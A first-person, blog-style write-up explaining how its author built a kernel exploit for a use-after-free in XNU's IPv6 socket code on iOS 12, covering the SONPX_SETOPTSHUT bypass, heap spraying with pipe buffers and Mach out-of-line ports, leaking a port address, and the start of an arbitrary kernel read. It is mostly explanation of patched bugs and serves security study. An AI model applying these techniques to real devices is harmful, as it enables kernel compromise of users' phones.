used_sock
used_sock is a kernel exploit named after a use-after-free due to a dangling pointer in socket-related code. You can find more information here. The bug affects iOS 12-12.2, was patched in iOS 12.3, accidentally re-introduced in iOS 12.4, and then killed again in iOS 12.4.1. This bug was found by Ned Williamson of Google Project Zero, not me, I’m just writing an exploit for it.
For a bit of background, I got into reverse engineering sometime in 2014 and love messing with iOS internals. I have done a brief number of projects which have served as fantastic learning experiences. I’ve always been fond of jailbreaks and the exploits behind them. I briefly got into exploit development in 2017-2018 with Billy Ellis’ exploit challenges then kind of “stopped” as I didn’t really know where to go from there. In the fall of 2018 I started writing a debugger targeting jailbroken iOS. I worked on that for about a year and three months and have hit a good stopping point. However, during that time I wanted to get back into exploit development and pursue iOS security research but I kept getting sucked back into the debugger. My winter break was six weeks, so I swore to myself I’d write my first iOS kernel exploit by the time I had to go back to school. You can find it here. Writing that exploit was the best three weeks I’ve had in a long time. I am extremely grateful for all the people/resources that make it possible to get started.
Also, if you happen to see any mistakes I made, please tell me about them. My twitter is at the end of this writeup.
The Bug
When calling disconnectx
on a TCP socket, we’ll eventually hit this function:
void
in6_pcbdetach(struct inpcb *inp)
{
struct socket *so = inp->inp_socket;
...
if (!(so->so_flags & SOF_PCBCLEARING)) {
struct ip_moptions *imo;
struct ip6_moptions *im6o;
inp->inp_vflag = 0;
if (inp->in6p_options != NULL) {
m_freem(inp->in6p_options);
inp->in6p_options = NULL;
}
ip6_freepcbopts(inp->in6p_outputopts);
ROUTE_RELEASE(&inp->in6p_route);
/* free IPv4 related resources in case of mapped addr */
if (inp->inp_options != NULL) {
(void) m_free(inp->inp_options);
inp->inp_options = NULL;
}
im6o = inp->in6p_moptions;
inp->in6p_moptions = NULL;
imo = inp->inp_moptions;
inp->inp_moptions = NULL;
sofreelastref(so, 0);
inp->inp_state = INPCB_STATE_DEAD;
/* makes sure we're not called twice from so_close */
so->so_flags |= SOF_PCBCLEARING;
inpcb_gc_sched(inp->inp_pcbinfo, INPCB_TIMER_FAST);
/*
* See inp_join_group() for why we need to unlock
*/
if (im6o != NULL || imo != NULL) {
socket_unlock(so, 0);
if (im6o != NULL)
IM6O_REMREF(im6o);
if (imo != NULL)
IMO_REMREF(imo);
socket_lock(so, 0);
}
}
}
xnu-4903.221.2/bsd/netinet6/ip6_pcb.c
You’ll notice a pattern of “free, NULL”, except around this line:
ip6_freepcbopts(inp->in6p_outputopts);
. Taking a look at ip6_freepcbopts
:
void
ip6_freepcbopts(struct ip6_pktopts *pktopt)
{
if (pktopt == NULL)
return;
ip6_clearpktopts(pktopt, -1);
FREE(pktopt, M_IP6OPT);
}
xnu-4903.221.2/bsd/netinet6/ip6_output.c
inp->in6p_outputopts
is freed but never NULL’ed out. in6p_outputopts
is a macroxnu-4903.221.2/bsd/netinet/in_pcb.h that expands to inp_depend6.inp6_outputopts
, which is a pointer to an ip6_pktopts
struct:
struct ip6_pktopts {
struct mbuf *ip6po_m; /* Pointer to mbuf storing the data */
int ip6po_hlim; /* Hoplimit for outgoing packets */
/* Outgoing IF/address information */
struct in6_pktinfo *ip6po_pktinfo;
/* Next-hop address information */
struct ip6po_nhinfo ip6po_nhinfo;
struct ip6_hbh *ip6po_hbh; /* Hop-by-Hop options header */
/* Destination options header (before a routing header) */
struct ip6_dest *ip6po_dest1;
/* Routing header related info. */
struct ip6po_rhinfo ip6po_rhinfo;
/* Destination options header (after a routing header) */
struct ip6_dest *ip6po_dest2;
int ip6po_tclass; /* traffic class */
int ip6po_minmtu; /* fragment vs PMTU discovery policy */
#define IP6PO_MINMTU_MCASTONLY -1 /* default; send at min MTU for multicast */
#define IP6PO_MINMTU_DISABLE 0 /* always perform pmtu disc */
#define IP6PO_MINMTU_ALL 1 /* always send at min MTU */
/* whether temporary addresses are preferred as source address */
int ip6po_prefer_tempaddr;
#define IP6PO_TEMPADDR_SYSTEM -1 /* follow the system default */
#define IP6PO_TEMPADDR_NOTPREFER 0 /* not prefer temporary address */
#define IP6PO_TEMPADDR_PREFER 1 /* prefer temporary address */
int ip6po_flags;
#if 0 /* parameters in this block is obsolete. do not reuse the values. */
#define IP6PO_REACHCONF 0x01 /* upper-layer reachability confirmation. */
#define IP6PO_MINMTU 0x02 /* use minimum MTU (IPV6_USE_MIN_MTU) */
#endif
#define IP6PO_DONTFRAG 0x04 /* no fragmentation (IPV6_DONTFRAG) */
#define IP6PO_USECOA 0x08 /* use care of address */
};
xnu-4903.221.2/bsd/netinet6/ip6_var.h
This structure is written to and initialized with setsockopt
. It’s read from with getsockopt
.
To initialize it, we just have to call setsockopt
with some arbitrary option, and we’ll hit this code:
static int
ip6_pcbopt(int optname, u_char *buf, int len, struct ip6_pktopts **pktopt,
int uproto)
{
struct ip6_pktopts *opt;
opt = *pktopt;
if (opt == NULL) {
opt = _MALLOC(sizeof (*opt), M_IP6OPT, M_WAITOK);
if (opt == NULL)
return (ENOBUFS);
ip6_initpktopts(opt);
*pktopt = opt;
}
return (ip6_setpktopt(optname, buf, len, opt, 1, 0, uproto));
}
xnu-4903.221.2/bsd/netinet6/ip6_output.c
Same deal with setting other options after it’s been initialized.
So if we’re quick, we can reallocate the memory pointed to by inp->in6p_outputopts
after we shutdown the socket. But then what? We control its contents, and we can read from it without a problem (there is nothing that checks if the socket is disconnected in ip6_getpcbopt
). Attempting to write to the freed struct by calling setsockopt
on a disconnected socket causes sosetoptlock
to bail with EINVAL
:
if ((so->so_state & (SS_CANTRCVMORE | SS_CANTSENDMORE)) ==
(SS_CANTRCVMORE | SS_CANTSENDMORE) &&
(so->so_flags & SOF_NPX_SETOPTSHUT) == 0) {
/* the socket has been shutdown, no more sockopt's */
error = EINVAL;
goto out;
}
xnu-4903.221.2/bsd/kern/uipc_socket.c
This check is pretty much the only thing standing between us and writing to the freed struct. How can we make this check fail? Thankfully for us, XNU has provides the option SO_NP_EXTENSIONS
and a single flag, SONPX_SETOPTSHUT
:
struct so_np_extensions {
u_int32_t npx_flags;
u_int32_t npx_mask;
};
#define SONPX_SETOPTSHUT 0x000000001 /* flag for allowing setsockopt after shutdown */
xnu-4903.221.2/bsd/sys/socket.h
And upon setting the SONPX_SETOPTSHUT
flag, SOF_NPX_SETOPTSHUT
gets OR’ed into so->so_flags
…
if ((sonpx.npx_mask & SONPX_SETOPTSHUT)) {
if ((sonpx.npx_flags & SONPX_SETOPTSHUT))
so->so_flags |= SOF_NPX_SETOPTSHUT;
else
so->so_flags &= ~SOF_NPX_SETOPTSHUT;
}
xnu-4903.221.2/bsd/kern/uipc_socket.c
…which is just what we needed for that check to fail.
Exploitation
The goal is to get a userland handle to a controlled Mach port. That was pretty straightforward while exploiting CVE-2017-13861 because the bug dealt directly with an over-released Mach port. If we’re lucky enough, (after doing some intermediary work) we’d be able to reallocate that port with controlled contents, while retaining a valid userland handle to it. Since this bug doesn’t deal with an over-released Mach port, we have to figure something else out.
Reallocating an ip6_pktopts
struct with controlled contents
The first thing is to replicate the ip6_pktopts
struct for use in the exploit.
struct route_in6 {
uint64_t ro_rt;
uint64_t ro_lle;
uint64_t ro_srcia;
uint32_t ro_flags;
struct sockaddr_in6 ro_dst;
};
xnu-4903.221.2/bsd/netinet6/in6.h
struct ip6_pktopts {
uint64_t ip6po_m;
int ip6po_hlim;
uint64_t ip6po_pktinfo;
struct {
uint64_t ip6po_nhi_nexthop;
struct route_in6 ip6po_nhi_route;
} ip6po_nhinfo;
uint64_t ip6po_hbh;
uint64_t ip6po_dest1;
struct {
uint64_t ip6po_rhi_rthdr;
struct route_in6 ip6po_rhi_route;
} ip6po_rhinfo;
uint64_t ip6po_dest2;
int ip6po_tclass;
int ip6po_minmtu;
int ip6po_prefer_tempaddr;
int ip6po_flags;
};
xnu-4903.221.2/bsd/netinet6/ip6_var.h
Replicating this struct wasn’t as much of a headache as I thought it would be. The only other struct which needed to be replicated was struct route_in6
because ip6po_nfinfo.ip6po_nhi_route
and ip6po_rhinfo.ip6po_rhi_route
are not pointers. The others can be found in <netinet/in.h>
.
Before we continue, it’s important to understand the kernel “heap” is set up. It’s split into many different zones. Some zones contain elements of varying sizes and types, as long as those elements are less than or equal to zone’s elem_size
, like the kalloc
zones, and others are dedicated to holding elements of the same size and type, like the ipc.ports
zone for Mach ports and the ipc.vouchers
zone for Mach vouchers. A feature of the zone allocator is garbage collection, where a page of memory from any zone containing all free elements are returned back for future use by other zones. It’s an incredibly useful thing to abuse. For example, since Mach ports are in their own zone, and there isn’t any way to spray (useful) controlled data into ipc.ports
, we can allocate an entire page of Mach ports, free them all, force garbage collection to send that page back to the zone allocator, and hopefully snatch it back for a kalloc
allocation. zprint(1)
shows you information about the kernel zones. Here’s the different kalloc
zones on my Macbook (command shamelessly stolen from PsychoTea’s machswap writeup)
$ sudo zprint | awk 'NR<=3 || /kalloc/'
elem cur max cur max cur alloc alloc
zone name size size size #elts #elts inuse size count
-------------------------------------------------------------------------------------------------------------
kalloc.16 16 17320K 19951K 1108480 1276896 1060838 4K 256 C
kalloc.32 32 6640K 8867K 212480 283754 167654 4K 128 C
kalloc.48 48 10868K 13301K 231850 283754 223454 4K 85 C
kalloc.64 64 21584K 29927K 345344 478836 339291 4K 64 C
kalloc.80 80 5924K 8867K 75827 113501 69303 4K 51 C
kalloc.96 96 2736K 5254K 29184 56050 25280 8K 85 C
kalloc.128 128 12532K 13301K 100256 106408 99488 4K 32 C
kalloc.160 160 2724K 3503K 17433 22420 16597 8K 51 C
kalloc.192 192 8904K 11823K 47488 63056 46392 12K 64 C
kalloc.224 224 4468K 7006K 20425 32028 18582 16K 73 C
kalloc.256 256 4476K 5911K 17904 23646 17775 4K 16 C
kalloc.288 288 3420K 5838K 12160 20759 11058 20K 71 C
kalloc.368 368 12196K 14012K 33936 38991 32114 32K 89 C
kalloc.400 400 7580K 8757K 19404 22420 18602 20K 51 C
kalloc.512 512 53620K 67336K 107240 134672 106302 4K 8 C
kalloc.576 576 188K 230K 334 410 303 4K 7 C
kalloc.768 768 9024K 17734K 12032 23646 11543 12K 16 C
kalloc.1024 1024 24048K 29927K 24048 29927 23699 4K 4 C
kalloc.1152 1152 1240K 1556K 1102 1383 985 8K 7 C
kalloc.1280 1280 280K 1153K 224 922 153 20K 16 C
kalloc.1664 1664 504K 1614K 310 993 283 28K 17 C
kalloc.2048 2048 13908K 19951K 6954 9975 6930 4K 2 C
kalloc.4096 4096 6732K 19951K 1683 4987 1677 4K 1 C
kalloc.6144 6144 1068K 1556K 178 259 172 12K 2 C
kalloc.8192 8192 3744K 7882K 468 985 453 8K 1 C
Of course, there are many more other zones than this, but the kalloc
zones are what we’re going to be focusing on. You’re able to see the different kalloc
zones that are present in a given version of XNU by looking at osfmk/kern/kalloc.c
. It varies across different versions, but xnu-4903.221.2
defines the kalloc zones like this (with 32-bit specific and error handling code removed):
static const struct kalloc_zone_config {
int kzc_size;
const char *kzc_name;
} k_zone_config[] = {
#define KZC_ENTRY(SIZE) { .kzc_size = (SIZE), .kzc_name = "kalloc." #SIZE }
/* 64-bit targets, generally */
KZC_ENTRY(16),
KZC_ENTRY(32),
KZC_ENTRY(48),
KZC_ENTRY(64),
KZC_ENTRY(80),
KZC_ENTRY(96),
KZC_ENTRY(128),
KZC_ENTRY(160),
KZC_ENTRY(192),
KZC_ENTRY(224),
KZC_ENTRY(256),
KZC_ENTRY(288),
KZC_ENTRY(368),
KZC_ENTRY(400),
KZC_ENTRY(512),
KZC_ENTRY(576),
KZC_ENTRY(768),
KZC_ENTRY(1024),
KZC_ENTRY(1152),
KZC_ENTRY(1280),
KZC_ENTRY(1664),
KZC_ENTRY(2048),
/* all configurations get these zones */
KZC_ENTRY(4096),
KZC_ENTRY(6144),
KZC_ENTRY(8192),
KZC_ENTRY(16384),
KZC_ENTRY(32768),
#undef KZC_ENTRY
};
xnu-4903.221.2/osfmk/kern/kalloc.c
Now that we understand how the zone allocator works, let’s go back to this code:
static int
ip6_pcbopt(int optname, u_char *buf, int len, struct ip6_pktopts **pktopt,
int uproto)
{
struct ip6_pktopts *opt;
opt = *pktopt;
if (opt == NULL) {
opt = _MALLOC(sizeof (*opt), M_IP6OPT, M_WAITOK);
if (opt == NULL)
return (ENOBUFS);
ip6_initpktopts(opt);
*pktopt = opt;
}
return (ip6_setpktopt(optname, buf, len, opt, 1, 0, uproto));
}
xnu-4903.221.2/bsd/netinet6/ip6_output.c
_MALLOC
is a macro around __MALLOC
. __MALLOC
eventually calls kalloc_canblock
. kalloc_canblock
chooses the appropriate kalloc
zone based on the size of the allocation. After a zone has been chosen, kalloc_canblock
calls zalloc_canblock_tag
, which finally calls zalloc_internal
, returning a free block of memory from the specified zone. So our ip6_pktopts
struct is allocated in a kalloc
zone, but which one? On an iPhone SE running iOS 12.0, sizeof(struct ip6_pktopts)
is 192, which fits perfectly into the kalloc.192
zone. So after freeing a bunch of vulnerable sockets, we need to spray kalloc.192
with fake ip6_pktopts
structs. One of the freed ip6_pktopts
would get reallocated with controlled contents, and… that’s it. We’d have no way (except by freeing/reallocating again, which obliterates reliability) of updating the fields of that controlled struct to trick the kernel into reading out its own memory, so we have to figure out something else.
Pipe buffers
A pipe is a communication mechanism between different processes. It has a read end (0
) and a write end (1
). If a process calls write
to send some data via the pipe, another process can call read
to extract that data. In the kernel, a pipe is represented with this struct:
struct pipe {
struct pipebuf pipe_buffer; /* data storage */
#ifdef PIPE_DIRECT
struct pipemapping pipe_map; /* pipe mapping for direct I/O */
#endif
struct selinfo pipe_sel; /* for compat with select */
pid_t pipe_pgid; /* information for async I/O */
struct pipe *pipe_peer; /* link with other direction */
u_int pipe_state; /* pipe status info */
int pipe_busy; /* busy flag, mostly to handle rundown sanely */
TAILQ_HEAD(,eventqelt) pipe_evlist;
lck_mtx_t *pipe_mtxp; /* shared mutex between both pipes */
struct timespec st_atimespec; /* time of last access */
struct timespec st_mtimespec; /* time of last data modification */
struct timespec st_ctimespec; /* time of last status change */
struct label *pipe_label; /* pipe MAC label - shared */
};
The pipe_buffer
, apart from keeping track of a few other things, has a pointer to a buffer that contains the data written to the pipe. Taking a look at struct pipebuf
:
struct pipebuf {
u_int cnt; /* number of chars currently in buffer */
u_int in; /* in pointer */
u_int out; /* out pointer */
u_int size; /* size of buffer */
caddr_t buffer; /* kva of buffer */
};
cnt
and size
are self-explanatory. in
and out
are offsets from the start of buffer
. cnt
, in
, and out
change in accordance to calls to read
and write
. For example, let’s say we start with a pipe buffer without anything in it. cnt
, in
, out
, will be 0
.
If we write
0x20
bytes, cnt
will be 0x20
, in
will be 0x20
, and out
will still be 0
.
If we read
0x10
bytes, cnt
will be 0x10
, in
will still be 0x20
, and out
will be 0x10
.
If we write
0x50
bytes, cnt
will be 0x60
, in
will be 0x70
, and out
will still be 0x10
.
If we read
0x40
bytes, cnt
will be 0x20
, in
will be still 0x70
, and out
will be 0x50
.
Reading x
bytes decreases cnt
by x
and increases out
by x
. in
is unchanged.
Writing y
bytes increases cnt
by y
and increases in
by y
. out
is unchanged.
Knowing how cnt
, in
, and out
change across calls to read
and write
isn’t important to how I went about exploiting this bug, but I felt that briefly covering that was better than not acknowledging it at all.
We can use a pipe buffer to store arbitrary data in the kernel. Instead of outright spraying fake ip6_pktopts
structs, we would spray pipe buffers containing a fake ip6_pktopts
struct. If one of the freed structs were reallocated with one of those fake pipe buffer-backed structs, the problem of updating its fields would be solved. To update the fields of our reallocated struct, we’d simply read
out the entirety of the pipe buffer into an ip6_pktopts
struct variable, update its fields, then write
it back into the pipe buffer. An additional bonus is because the allocation backing our controlled ip6_pktopts
struct lives in kernel space, SMAP won’t be an issue. SMAP (Supervisor Mode Access Prevention), introduced in A10 chips, prevents the kernel from freely dereferencing userland pointers.
Pipes live in their own zone, pipe zone
, but the pipe buffer is allocated from the kalloc
family of zones. This is great for us because ip6_pktopts
structs are also kalloc
allocations. But what kalloc
zone does a pipe buffer get allocated from? When you create a pipe, its associated pipe buffer isn’t allocated until you call write
. Calling write
on a pipe causes pipe_write
to get called, and if the pipe buffer hasn’t been created yet, choose_pipespace
is called to select the appropriate kalloc
zone based on the size of written data. choose_pipespace
uses an array of kalloc
zones to make its decision:
static const unsigned int pipesize_blocks[] = {512,1024,2048,4096, 4096 * 2, PIPE_SIZE , PIPE_SIZE * 4 };
xnu-4903.221.2/bsd/kern/sys_pipe.c
There’s an issue. The smallest kalloc
zone for a pipe buffer is kalloc.512
, and an ip6_pktopts
struct is allocated from kalloc.192
. We can’t spray pipe buffers and ever expect to reallocate one with a freed ip6_pktopts
struct because they come from different zones. However, if we allocate a bunch of ip6_pktopts
structs, free them, trigger garbage collection, the pages with those structs will be sent back to the zone allocator, ready to be used for a brand new kalloc.512
pipe buffer allocation. It’s a simple idea, but not as straightforward in code. Triggering garbage collection was the biggest headache I faced while writing this exploit.
Reallocating the struct
Garbage collection will trigger when the zone map is 95% full. All devices have the same sized zone map, 384 MB, so triggering garbage collection is just a matter of filling it up. A great way to create controlled kalloc
allocations is by sending a Mach message containing out of line ports (non-64 bit specific code removed).
typedef struct
{
void* address;
boolean_t deallocate: 8;
mach_msg_copy_options_t copy: 8;
mach_msg_type_name_t disposition : 8;
mach_msg_descriptor_type_t type : 8;
mach_msg_size_t count;
} mach_msg_ool_ports_descriptor_t;
xnu-4903.221.2/osfmk/mach/message.h
address
points to a userland allocation of count
Mach port names. When you send a Mach message containing out of line ports, the kernel will take each 32 bit Mach port name, convert it to a 64 bit pointer, and allocate a kalloc
‘ed buffer for however many ports there are. For example, if we want to allocate from kalloc.256
, we would only send 32 out of line ports because 256/8 == 32
. So if you wanted to allocate memory from kalloc
zone n
, you would send n/8
out of line ports. In order to free an OOL port buffer, you would call mach_port_destroy
on the destination port of the message.
It’s time to try and get a dangling pointer to an ip6_pktopts
struct reallocated with a kalloc.512
pipe buffer. But we need to think ahead. If we reallocate one of those ip6_pktopts
structs, we’ll be able to build an arbitrary kernel read. But we’ll have no place to start looking for the pointers we need to build a fake tfp0 port. Trying to guess pointers is ridiculous so we have to think of something else. I’m sure you remember reading about OOL-port-containing Mach messages half a minute ago. A leaked Mach port pointer is the key to turning a somewhat useless (in this context) future kernel read into a strong primitive that can eventually get us the kernel base, the kernel slide, and the pointers for a fake tfp0 port. New plan: instead of only spraying pipe buffers, we’re going to alternate between spraying pipe buffers and creating kalloc.512
OOL port allocations with a Mach port created in userland. I’m going to call that port leaked_port
. That way, some of the dangling ip6_pktopts
structs will overlap with kalloc.512
pipe buffers and some will overlap with a bunch of pointers to the underlying struct ipc_port
leaked_port
represents in the kernel. In order to distinguish leaked_port
from other Mach ports in kernelspace, we’re going to set its ip_context
to a recognizeable value, like 0x1122334455667788
. ip_context
is a field within struct ipc_port
. It can be written to with mach_port_set_context
and read from with mach_port_get_context
.
The first thing to do is create an array of vulnerable sockets, an array of pipes, and the Mach port we’re going to leak. We need to fill up the zone map, but we don’t want to fill it up too much, as garbage collection would trigger early, causing the exploit to fail. Through experimentation I found that filling 90% of it with pagesized allocations sets us up to reliably trigger garbage collection later. Why pagesized allocations? Because garbage collection only sends pages with all free elements back to the zone allocator. What better way allows for complete control over a page of memory than controlling its only allocation? We create dangling pointers to inp_depend6.inp6_outputopts
for each socket by calling disconnectx
, then we try and trigger garbage collection. Another set of pagesized allocations are going to be made, but this time, at the expense of only 60% of the zone map. Of course, we only have enough space in the zone map for another 10%, but I found doing this not only triggers garbage collection, but prevents “zone map exhausted” panics if the exploit fails a couple times in a row or garbage collection is not triggered in a timely manner.
Garbage collection will trigger sometime while allocating the second set of pagesized allocations. We’ll know it has triggered if we measure the time it takes to send one of our OOL Mach messages. We call mach_absolute_time
before and after sending a message and then subtract the “after” with the “before” for the elapsed time. I hesitate to use any other word than “time”, because according to an old Apple Technical Q&A Document, the units of mach_absolute_time
are “in terms of the Mach absolute time unit”. I’ve got no idea what that means so I’ll stick to “time”. Anyway, after a lot of experimentation, garbage collection seems to have triggered when the elapsed time is greater than 100000.
Garbage collection has triggered and we have one chance to pull this off. As said before, we’re going to be alternating between creating a kalloc.512
pipe buffer and a kalloc.512
OOL port allocation with leaked_port
. We’re going to be doing this inside a loop bounded by the number of pipes in the pipe array I mentioned earlier, which is 3100. 3100 doesn’t really mean anything, that number was merely the result of me trying to increase exploit success rate. Anyway, since we’re alternating between pipe buffers and OOL allocations, 1550 of each are going to be created. When I create a pipe buffer and send in a fake ip6_pktopts
struct, I’m going to record a magic value, 0xcafe
, in the upper 16 bits of the ip6po_minmtu
field. I’ll also record the index of the pipe being written to in the lower 16 bits. This will come in handy later. We also need to go slow because we didn’t wait for the garbage collection to actually finish, hence the calls to pthread_yield_np
and usleep
.
If all went well, several freed ip6_pktopts
structs were reallocated with pipe buffers and kernel pointers to leaked_port
. To check for reallocated ip6_pktopts
structs, we’re going to loop through the array of sockets, read out the value of ip6po_minmtu
with getsockopt
, and check if the top 16 bits of it is equal to 0xcafe
. If it is, we’ve found our evil_socket
! We’ll read the bottom 16 bits for the index of the pipe the reallocated ip6_pktopts
struct resides in, granting us our evil_pipe
. We’ll call read
and write
on evil_pipe
to update our reallocated ip6_pktopts
struct, and we’ll use evil_socket
with getsockopt
and setsockopt
to have the kernel interact with it. We’ll also check for overlapped kernel pointers to leaked_port
. If a freed ip6_pktopts
struct got reallocated with a bunch of kernel pointers, the top 32 bits of one would reside in ip6po_minmtu
and the bottom 32 bits would reside in ip6po_tclass
. Kernel pointers are very distinct, usually looking something like 0xffffff(e|f)[A-Fa-f0-9]{9}
. We can simply apply a bitmask to whatever number results from ((uint64_t)minmtu << 32) | tclass
, and if it looks like a kernel pointer, we’ll add it to an array of possible kernel pointers. Why an array? Because it’s possible the memory that some of our freed ip6_pktopts
structs were reallocated with is neither a pipe buffer nor from an OOL port allocation, but a pointer to something entirely different. Our code is only checking if the aforementioned number looks like a kernel pointer. At this point, we have no way of knowing what a given pointer points to.
Once we’ve got our evil_socket
, evil_pipe
, and array of kernel pointers, it’s time to leak the address to leaked_port
. But how can we know if a pointer points to leaked_port
? Remember how many OOL allocations we made with leaked_port
while trying to reallocate our freed ip6_pktopts
structs? It was 1550, so logically, there should be an abundance of pointers to leaked_port
in the kernel pointer array. Looping through the array and checking which pointer occurs the most is sufficient to leak the address of leaked_port
. Only once did this strategy fail in the hundreds of times I’ve ran this exploit. But just to be safe, we need to make sure this pointer is in fact leaked_port
. Remember how we set leaked_port
’s ip_context
to 0x1122334455667788
earlier? We have to check for that. But there’s an issue: we cannot pass a kernel pointer to mach_port_get_context
. It needs to be a userland Mach port name. A way to read arbitrary kernel memory would really come in handy at this point. If we had one now, we could read out 64 bits from the possible kernel pointer to leaked_port
plus the offset of the ip_context
field in struct ipc_port
to verify if it is 0x1122334455667788
.
Building an arbitrary kernel read
We control an ip6_pktopts
struct, so let’s take a look at what we can do with it. Based on option_name
in a call to getsockopt
, ip6_getpcbopt
will be called to fetch the option’s value. Then it calls sooptcopyout
to copyout
the option’s value into the sopt_val
field of the sopt
parameter. We’ll use evil_socket
in the calls to getsockopt
to have the kernel work with our controlled ip6_pktopt
struct. For reference, here is the function definition for copyout
from its man
page:
int copyout(const void *kaddr, void *uaddr, size_t len);
copyout
simply copies len
bytes from kaddr
into uaddr
. If we control kaddr
, we can build an arbitrary kernel read.
I included the entire function so we can go through each option to figure out what will work and what won’t.
static int
ip6_getpcbopt(struct ip6_pktopts *pktopt, int optname, struct sockopt *sopt)
{
void *optdata = NULL;
int optdatalen = 0;
struct ip6_ext *ip6e;
struct in6_pktinfo null_pktinfo;
int deftclass = 0, on;
int defminmtu = IP6PO_MINMTU_MCASTONLY;
int defpreftemp = IP6PO_TEMPADDR_SYSTEM;
switch (optname) {
case IPV6_PKTINFO:
if (pktopt && pktopt->ip6po_pktinfo)
optdata = (void *)pktopt->ip6po_pktinfo;
else {
/* XXX: we don't have to do this every time... */
bzero(&null_pktinfo, sizeof (null_pktinfo));
optdata = (void *)&null_pktinfo;
}
optdatalen = sizeof (struct in6_pktinfo);
break;
case IPV6_TCLASS:
if (pktopt && pktopt->ip6po_tclass >= 0)
optdata = (void *)&pktopt->ip6po_tclass;
else
optdata = (void *)&deftclass;
optdatalen = sizeof (int);
break;
case IPV6_HOPOPTS:
if (pktopt && pktopt->ip6po_hbh) {
optdata = (void *)pktopt->ip6po_hbh;
ip6e = (struct ip6_ext *)pktopt->ip6po_hbh;
optdatalen = (ip6e->ip6e_len + 1) << 3;
}
break;
case IPV6_RTHDR:
if (pktopt && pktopt->ip6po_rthdr) {
optdata = (void *)pktopt->ip6po_rthdr;
ip6e = (struct ip6_ext *)pktopt->ip6po_rthdr;
optdatalen = (ip6e->ip6e_len + 1) << 3;
}
break;
case IPV6_RTHDRDSTOPTS:
if (pktopt && pktopt->ip6po_dest1) {
optdata = (void *)pktopt->ip6po_dest1;
ip6e = (struct ip6_ext *)pktopt->ip6po_dest1;
optdatalen = (ip6e->ip6e_len + 1) << 3;
}
break;
case IPV6_DSTOPTS:
if (pktopt && pktopt->ip6po_dest2) {
optdata = (void *)pktopt->ip6po_dest2;
ip6e = (struct ip6_ext *)pktopt->ip6po_dest2;
optdatalen = (ip6e->ip6e_len + 1) << 3;
}
break;
case IPV6_NEXTHOP:
if (pktopt && pktopt->ip6po_nexthop) {
optdata = (void *)pktopt->ip6po_nexthop;
optdatalen = pktopt->ip6po_nexthop->sa_len;
}
break;
case IPV6_USE_MIN_MTU:
if (pktopt)
optdata = (void *)&pktopt->ip6po_minmtu;
else
optdata = (void *)&defminmtu;
optdatalen = sizeof (int);
break;
case IPV6_DONTFRAG:
if (pktopt && ((pktopt->ip6po_flags) & IP6PO_DONTFRAG))
on = 1;
else
on = 0;
optdata = (void *)&on;
optdatalen = sizeof (on);
break;
case IPV6_PREFER_TEMPADDR:
if (pktopt)
optdata = (void *)&pktopt->ip6po_prefer_tempaddr;
else
optdata = (void *)&defpreftemp;
optdatalen = sizeof (int);
break;
default: /* should not happen */
#ifdef DIAGNOSTIC
panic("ip6_getpcbopt: unexpected option\n");
#endif
return (ENOPROTOOPT);
}
return (sooptcopyout(sopt, optdata, optdatalen));
}
xnu-4903.221.2/bsd/netinet6/ip6_output.c
Right off the bat we can eliminate IPV6_DONTFRAG
. It will ever only give us back a 0
or a 1
, which is useless.
IPV6_TCLASS
, IPV6_USE_MIN_MTU
, and IPV6_PREFER_TEMPADDR
are also useless. In each of those cases, the code assigns optdata
to the address of pktopt->ip6po_tclass
, pktopt->ip6po_minmtu
, and pktopt->ip6po_prefer_tempaddr
, respectively. pktopt
is the reallocated ip6_pktopts
struct inside our pipe buffer. Since we cannot change the address of where our pipe buffer is allocated, we won’t be able to control optdata
, which will be the kaddr
argument to copyout
. If that isn’t immediately clear, perhaps looking at some assembly will help. I’ll use IPV6_USE_MIN_MTU
for this example. This code optdata = (void *)&pktopt->ip6po_minmtu;
and the following call to copyout
would look something like this in assembly:
LDR X0, [<Rn>, #<imm>] ; assume Rn+imm points to the address of the pktopt parameter
ADD X0, X0, #<imm> ; assume imm is the offset of the ip6po_minmtu field
; and add it to the address of pktopt to get the address of
; pktopt->ip6po_minmtu
; X0 = &pktopt->ip6po_minmtu (optdata, aka kaddr)
LDR X1, [<Rn>, #<imm>] ; assume Rn = the sopt parameter,
; and imm is the offset of the sopt_val field
; X1 = sopt->sopt_val (uaddr)
MOV W2, #4 ; W2 = sizeof(int) (optdatalen, aka len)
BL copyout
We cannot control X0
, or kaddr
. If we had control over X0
, we’d be able to trick the kernel into copying out four bytes of its own memory.
Let’s take a look at IPV6_HOPOPTS
. For this option, the code assigns optdata
to pktopt->ip6po_nexthop
. The plus side here is optdata
will no longer hold a value based on the address of our pipe buffer. Instead, it gets assigned to a pointer we control, granting us complete reign over copyout
’s kaddr
argument. But there’s a problem: optdatalen
, the len
argument to copyout
, is determined by a field of a struct pointed to by optdata
. That field is pktopt->ip6po_nexthop->sa_len
. Imagine we just built an arbitrary kernel read out of IPV6_NEXTHOP
. We write our kaddr
to ip6po_nexthop
, which is really a macro for ip6po_nhinfo.ip6po_nhi_nexthop
, in our controlled pktopts
struct and call getsockopt
with evil_socket
and IPV6_NEXTHOP
. We hit this code:
optdata = (void *)pktopt->ip6po_nexthop;
optdatalen = pktopt->ip6po_nexthop->sa_len;
After the kernel places our controlled pointer into optdata
, it tries to read the sa_len
field from what should be a pointer to a sockaddr
struct, but is instead a pointer to whatever kernel memory we’re trying to read. In assembly, those two lines of code, followed by the copyout
call, would look something like this:
LDR X0, [<Rn>, #<imm>] ; assume Rn = the pktopt parameter and imm is the offset of
; the ip6po_nhinfo.ip6po_nhi_nexthop field
; X0 = pktopt->ip6po_nhinfo.ip6po_nhi_nexthop (optdata, aka kaddr)
LDR X1, [<Rn>, #<imm>] ; assume Rn = the sopt parameter and imm is the offset of
; the sopt_val field
; X1 = sopt->sopt_val (uaddr)
LDRB W2, [X0] ; W2 = *(uint8_t *)X0 (optdatalen, aka len)
BL copyout
struct sockaddr
looks like this:
struct sockaddr {
__uint8_t sa_len; /* total length */
sa_family_t sa_family; /* [XSI] address family */
char sa_data[14]; /* [XSI] addr value (actually larger) */
};
xnu-4903.221.2/bsd/sys/socket.h
The sa_len
field is the first member of the struct, which is why we don’t add an immediate to X0
when dereferencing pktopt->ip6po_nhinfo.ip6po_nhi_nexthop
.
If you haven’t spotted the issue yet, perhaps this will help. Say we are trying to read an 8 byte pointer from kaddr
, and the memory at kaddr
happens to look like this:
kaddr: 01 60 82 1c e0 ff ff ff 01 00 43 07 00 00 00 00
Take a look at the above assembly again. The kernel puts pktopt->ip6po_nhinfo.ip6po_nhi_nexthop
, the kaddr
parameter, into X0
, which is fine. Then it puts sopt->sopt_val
, the uaddr
parameter, into X1
, which is also fine. Then the kernel dereferences kaddr
and sticks the least significant byte of whatever kaddr
points to into W2
, which is the len
parameter to copyout
